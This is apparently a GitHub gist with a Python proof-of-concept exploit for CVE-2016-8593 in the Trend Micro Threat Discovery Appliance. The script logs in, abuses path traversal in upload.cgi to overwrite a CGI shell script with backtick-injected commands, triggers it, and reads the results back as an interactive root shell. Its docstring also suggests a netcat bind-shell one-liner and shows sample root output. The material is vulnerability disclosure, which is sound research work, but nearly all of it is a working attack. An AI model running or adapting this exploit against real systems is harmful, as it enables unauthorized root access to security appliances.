CVE-2016-8593 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 (latest) upload.cgi Remote Code Execution Vulnerability
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/local/bin/python | |
| """ | |
| Trend Micro Threat Discovery Appliance <= 2.6.1062r1 upload.cgi Remote Code Execution Vulnerability | |
| Found by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/ | |
| File: TDA_InstallationCD.2.6.1062r1.en_US.iso | |
| sha1: 8da4604c92a944ba8f7744641bce932df008f9f9 | |
| Download: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1 | |
| Summary: | |
| ======== | |
| There exists a post authenticated upload vulnerability that can be used to execute arbitrary code. | |
| Notes: | |
| ====== | |
| - Since this is a busybox, getting a connectback seemed hard. So, for this particular PoC, all I did was | |
| take command, upload bd, exec, read, rinse, repeat. | |
| - You maybe can get a binded netcat using '`nc -e /bin/sh -lp 1337`' but this at times broke the cgi and the rest of the | |
| log_query_system.cgi was unstable. | |
| - Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts... | |
| Example: | |
| ======== | |
| saturn:trend_micro_threat_discovery_upload_rce mr_me$ ./poc.py | |
| (+) usage: ./poc.py <target> <pass> | |
| (+) eg: ./poc.py 172.16.175.123 admin123 | |
| saturn:trend_micro_threat_discovery_upload_rce mr_me$ ./poc.py 172.16.175.123 admin123 | |
| (+) logged in... | |
| (+) popping shell, type 'exit' to exit. | |
| $ id | |
| uid=0(root) gid=0(root) | |
| $ uname -a | |
| Linux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown | |
| $ pwd | |
| /opt/TrendMicro/MinorityReport/www/cgi-bin | |
| $ exit | |
| """ | |
| import sys | |
| import re | |
| import requests | |
| requests.packages.urllib3.disable_warnings() | |
| if len(sys.argv) != 3: | |
| print "(+) usage: %s <target> <pass>" % sys.argv[0] | |
| print "(+) eg: %s 172.16.175.123 admin123" % sys.argv[0] | |
| sys.exit(-1) | |
| t = sys.argv[1] | |
| p = sys.argv[2] | |
| bu = "https://%s/" % t | |
| l_url = "%scgi-bin/logon.cgi" % bu | |
| u_url = "%scgi-bin/upload.cgi?dID=../../opt/TrendMicro/MinorityReport/www/cgi-bin/log_cache.sh" % bu | |
| e_url = "%scgi-bin/log_query_system.cgi" % bu | |
| r_url = "%snonprotect/si.txt" % bu | |
| s = requests.Session() | |
| # first we login... | |
| r = s.post(l_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False) | |
| if "frame.cgi" in r.text: | |
| print "(+) logged in..." | |
| print "(+) popping shell, type 'exit' to exit." | |
| cmd = '' | |
| while (cmd.lower() != "exit"): | |
| cmd = raw_input("$ ") | |
| if cmd.lower() == "exit": | |
| continue | |
| # now we upload to crush the log_cache.sh script | |
| bd = "`%s>/opt/TrendMicro/MinorityReport/www/nonprotect/si.txt`" % cmd | |
| u = { | |
| 'ajaxuploader_file': ('si', bd, 'text/plain'), | |
| } | |
| r = s.post(u_url, files=u, verify=False) | |
| # now we have to get the cmd executed... | |
| r = s.post(e_url, data={'act':'search','cache_id':''}, verify=False) | |
| # now we get the result | |
| r = s.get(r_url, verify=False) | |
| print r.text.rstrip() | |
| else: | |
| print "(-) login failed" | |
| sys.exit(-1) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment